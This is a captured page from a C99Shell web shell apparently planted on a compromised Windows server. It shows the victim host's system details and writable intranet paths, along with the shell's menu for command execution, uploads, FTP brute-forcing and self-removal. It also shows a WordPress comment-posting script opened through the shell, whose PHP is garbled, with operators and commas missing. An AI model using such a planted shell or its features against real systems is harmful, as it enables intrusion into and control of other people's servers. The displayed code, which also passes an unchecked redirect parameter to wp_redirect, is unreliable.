!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\blog\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     wp-comments-post.php (2.39 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require( dirname(__FILE__) . '/wp-config.php' );

nocache_headers();

$comment_post_ID = (int) $_POST['comment_post_ID'];

$status $wpdb->get_row("SELECT post_status, comment_status FROM $wpdb->posts WHERE ID = '$comment_post_ID'");

if ( empty(
$status->comment_status) ) {
    
do_action('comment_id_not_found'$comment_post_ID);
    exit;
} elseif ( 
'closed' ==  $status->comment_status ) {
    
do_action('comment_closed'$comment_post_ID);
    die( 
__('Sorry, comments are closed for this item.') );
} elseif ( 
'draft' == $status->post_status ) {
    
do_action('comment_on_draft'$comment_post_ID);
    exit;
}

$comment_author       trim($_POST['author']);
$comment_author_email trim($_POST['email']);
$comment_author_url   trim($_POST['url']);
$comment_content      trim($_POST['comment']);

// If the user is logged in
$user wp_get_current_user();
if ( 
$user->ID ) :
    
$comment_author       $wpdb->escape($user->display_name);
    
$comment_author_email $wpdb->escape($user->user_email);
    
$comment_author_url   $wpdb->escape($user->user_url);
else :
    if ( 
get_option('comment_registration') )
        die( 
__('Sorry, you must be logged in to post a comment.') );
endif;

$comment_type '';

if ( 
get_settings('require_name_email') && !$user->ID ) {
    if ( 
strlen($comment_author_email) || '' == $comment_author )
        die( 
__('Error: please fill the required fields (name, email).') );
    elseif ( !
is_email($comment_author_email))
        die( 
__('Error: please enter a valid email address.') );
}

if ( 
'' == $comment_content )
    die( 
__('Error: please type a comment.') );

$commentdata compact('comment_post_ID''comment_author''comment_author_email''comment_author_url''comment_content''comment_type''user_ID');

$comment_id wp_new_comment$commentdata );

if ( !
$user->ID ) :
    
$comment get_comment($comment_id);
    
setcookie('comment_author_' COOKIEHASH$comment->comment_authortime() + 30000000COOKIEPATHCOOKIE_DOMAIN);
    
setcookie('comment_author_email_' COOKIEHASH$comment->comment_author_emailtime() + 30000000COOKIEPATHCOOKIE_DOMAIN);
    
setcookie('comment_author_url_' COOKIEHASHclean_url($comment->comment_author_url), time() + 30000000COOKIEPATHCOOKIE_DOMAIN);
endif;

$location = ( empty($_POST['redirect_to']) ? get_permalink($comment_post_ID) : $_POST['redirect_to'] ) . '#comment-' $comment_id;
$location apply_filters('comment_post_redirect'$location$comment);

wp_redirect($location);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--